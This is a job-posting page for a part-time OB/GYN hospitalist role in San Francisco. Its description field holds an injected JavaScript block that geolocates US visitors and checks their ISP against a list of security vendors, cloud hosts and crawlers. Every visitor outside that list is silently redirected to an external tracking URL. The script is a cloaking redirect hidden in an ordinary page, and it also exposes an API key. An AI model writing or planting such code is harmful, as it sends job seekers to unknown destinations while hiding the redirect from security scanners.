OBGYN Hospitalist/Laborist

San Francisco, CA
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/530ec8068f497f20/7372f6633220990b6b98ae321f4d50ae32402f8300789d02b6b2ccda3d26d49c/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

We are seeking a dedicated Hospitalist/Laborist to provide comprehensive inpatient obstetric and gynecological care in a hospital setting.

  • Conduct patient assessments, develop care plans, and assist with C-Sections.
  • Round on hospitalized, antepartum, and post-op patients.
  • Cover ER call for OB/GYN and manage inpatient and emergency consultations.
  • Utilize EHR/EMR systems for documentation and communication.
  • Provide patient education and facilitate discharge planning.
  • Manage complex medical cases within a diverse patient population.

  • Qualifications:
  • MD or DO, licensed in California, with DEA certification.
  • At least 3 years OB/GYN experience preferred.
  • Strong clinical, communication, and teamwork skills.
  • Bilingual in English/Spanish preferred.
  • Critical care experience and proficiency in EHR systems are highly desirable.

  • This part-time, contract role offers $172,800–$244,800 annually for 24 hours/week, working in person to impact patient outcomes in a supportive environment.